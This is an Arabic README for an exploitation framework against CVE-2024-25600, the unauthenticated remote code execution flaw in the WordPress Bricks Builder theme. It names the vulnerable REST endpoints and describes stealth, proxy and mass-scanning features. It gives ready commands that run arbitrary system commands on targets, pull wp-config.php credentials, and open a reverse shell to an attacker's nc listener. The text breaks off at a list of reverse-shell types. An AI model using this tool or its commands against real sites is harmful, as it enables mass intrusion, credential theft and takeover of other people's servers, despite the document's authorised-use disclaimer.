
CVE-2024-25600 - استغلال RCE غير مصادق عليه لقالب Bricks Builder في WordPress. إطار استغلال متقدم مع صدفة تفاعلية، وصدفات عكسية، ورفع/تنزيل ملفات، وفحص غير متزامن، ووضع التخفي، ودعم بروكسي، وفحص ثغرات متعدد الخيوط. للاختبار الأمني المصرح به فقط.
أداة تقييم أمني معتمدة لـ CVE-2024-25600
المؤلف: Sudeepa Wanigarathna · الأداة: BricksRCE Exploiter v1.0
السكربت الرئيسي: cve-2024-25600.py
[!IMPORTANT] للاستخدام المصرح به فقط. هذه الأداة مخصصة للبحث الأمني والتعليم واختبار الأنظمة التي تملكها أو لديك إذن كتابي صريح لتقييمها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.
CVE-2024-25600 هي ثغرة حرجة لتنفيذ أوامر عن بعد غير مصادق عليها في قالب ووردبريس Bricks Builder. يؤدي التعامل غير السليم مع المدخلات التي يتحكم بها المستخدم في نقطة نهاية REST الخاصة بـ render_element إلى السماح للمهاجمين غير المصادق عليهم بتنفيذ أوامر PHP/نظام عشوائية على التركيبات المتأثرة.
BricksRCE Exploiter (cve-2024-25600.py) هي أداة تقييم بايثون كاملة الميزات لمتخصصي الأمن المصرح لهم من أجل:
| السمة | القيمة |
|---|---|
| معرف CVE | CVE-2024-25600 |
| CVSS | 9.8 (حرجة) |
| متجه الهجوم | شبكة — غير مصادق عليها |
| التأثير | تنفيذ أوامر عن بعد بالكامل، اختراق السرية / التكامل / التوفر |
| المنتج المتأثر | قالب ووردبريس Bricks Builder |
| الإصدارات المتأثرة | Bricks ≤ 1.9.6 (تم التصحيح في 1.9.6.1+) |
| نوع الثغرة | تنفيذ أوامر عن بعد غير مصادق عليها |
| CWE | CWE-94 (التحكم غير السليم في توليد الكود) |
| نقطة النهاية | الطريقة |
|---|---|
/wp-json/bricks/v1/render_element | POST |
/?rest_route=/bricks/v1/render_element | POST |
render_element مصمم بحمولة عنصر ضارة| القدرة | الوصف |
|---|---|
| اكتشاف الثغرة | تأكيد RCE من خلال فحص قائم على مؤشر خاضع للتحكم |
| استخراج nonce | اكتشاف nonce متعدد الطرق (البرامج النصية، شفرة المصدر، البيانات الوصفية، REST) |
| كشف الإصدار | تحديد إصدار Bricks Builder من CSS / readme / REST |
| صدفة تفاعلية | REPL كامل مع السجل والإكمال التلقائي ونقل الملفات |
| وضع الأمر الواحد | تنفيذ أمر واحد والخروج (مناسب للنصوص البرمجية) |
| مساعدات الصدفة العكسية | توليد صدفة عكسية bash / nc / Python / PHP / Perl / Ruby |
| استخراج wp-config | محاولة تحديد موقع وقراءة wp-config.php |
| المسح الجماعي | مسح متعدد الأهداف غير متزامن أو مترابط من قائمة URLs |
| القدرة | الوصف |
|---|---|
| تحديد المعدل | تأخير قابل للتكوين بين الطلبات |
| منطق إعادة المحاولة | تراجع أسي في حالات المهلة وأخطاء الاتصال |
| تدوير User-Agent | بصمات متصفح عشوائية لكل طلب |
| وضع التخفي | رؤوس Accept-Language / Accept-Encoding عشوائية |
| دعم الوكيل | HTTP, HTTPS, SOCKS5 / SOCKS5h |
| نقاط نهاية مزدوجة | تفضيل wp-json, rest_route، أو كليهما |
| وضع القوة | تخطي الفحص المسبق ومحاولة الاستغلال مباشرة |
| واجهة سطر أوامر غنية | أشرطة تقدم، جداول، لوحات ملونة عبر Rich |
| القدرة | الوصف |
|---|---|
| تصدير JSON / TXT | حفظ نتائج المسح والأهداف المعرضة للخطر |
| سجل الأوامر | تسجيل اختياري للأوامر المنفذة |
| تسجيل الملفات | سجل مستمر bricks_rce.log بالإضافة إلى مسارات سجل مخصصة |
pipgit clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 cve-2024-25600.py --help
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0 # اختياري — دعم وكيل SOCKS5
استبدل
https://target.exampleبهدف مختبر أو مصرح به فقط.
# صدفة تفاعلية
python3 cve-2024-25600.py -u https://target.example
# أمر واحد
python3 cve-2024-25600.py -u https://target.example --cmd "id"
# مسح جماعي
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json
# كشف الإصدار
python3 cve-2024-25600.py -u https://target.example --detect-version
# عبر وكيل Burp
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v
جميع الأمثلة تستخدم السكربت الرئيسي:
cve-2024-25600.py
python3 cve-2024-25600.py --help
تفتح صدفة RCE تفاعلية بعد تأكيد أن الهدف معرض للخطر.
python3 cve-2024-25600.py -u https://target.example
سير العمل:
--force)python3 cve-2024-25600.py -u https://target.example --cmd "whoami"
حفظ مخرجات الأمر في ملف:
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output
# الحمولة الافتراضية القائمة على استثناء PHP
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php
# الحمولة القائمة على system()
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system
python3 cve-2024-25600.py -u https://target.example --detect-version
دمجه مع أمر:
python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"
python3 cve-2024-25600.py -u https://target.example --extract-wp-config
يتم حفظه كـ wp-config_<target>.txt في حالة النجاح.
# الطرفية 1 — المستمع
nc -lvnp 4444
# الطرفية 2 — صدفة عكسية bash
python3 cve-2024-25600.py -u https://target.example \
--reverse-shell bash \
--lhost 10.0.0.5 \
--lport 4444
جميع أنواع الصداف العكسية المدعومة: